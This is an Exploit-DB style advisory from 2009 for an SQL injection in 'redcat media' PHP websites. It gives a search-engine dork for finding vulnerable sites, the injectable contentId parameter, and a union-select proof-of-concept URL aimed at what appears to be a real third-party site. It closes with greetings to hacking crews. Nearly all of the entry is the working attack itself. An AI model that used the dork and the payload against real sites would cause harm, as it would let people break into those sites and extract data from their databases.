redcat media - SQL Injection

EDB-ID:

10043

CVE:

N/A


Author:

s4va

Type:

webapps


Platform:

PHP

Date:

2009-10-02


[x]==========================================[x]
|             AntiSecurity[dot]org           |
[x]==========================================[x]
[x]==========================================[x]

| Title            : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor           : http://www.redcatmedia.co.uk/
| Date             : 2 oktober 2009 ( Indonesia )
| Author           : s4va
| Contact          : sava_sword@yahoo.com
| Blog             : http://s4vaworld.uni.cc

[x]==========================================[x]

| Dork : "Powered by RedCat" inurl:index.php?contentId=

[x]==========================================[x]

| Exploit
| http://target/index.php?contentId=[sql]

[x]==========================================[x]

| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

[x]==========================================[x]

| THX TO:
|blackstar ; x-shadow ; cr4wl3r ; bl4ck_3n91n3 ; k0il ; inc0mp13te ; n0c0py
|thund3r-x2 ; dimm net ; jack- ; c0li ; zxvf ; Oon_Boy ; NoGe ; Kecemplungkalen ; angel
|skay kyu ; t3cm4n ; indounderground ; nyubiz ; n1nj4_blu3 ; qu4ck ; mad0nk
|^cyber_tomat^ ; odod ; atan6 ; th3k1llr3j45q ; em|nem
|mainhack brotherhood ; HipHopHeroes(dot)net ; antisecurity(dot)org N ALL WHO
SUPPORT ME

[x]==========================================[x]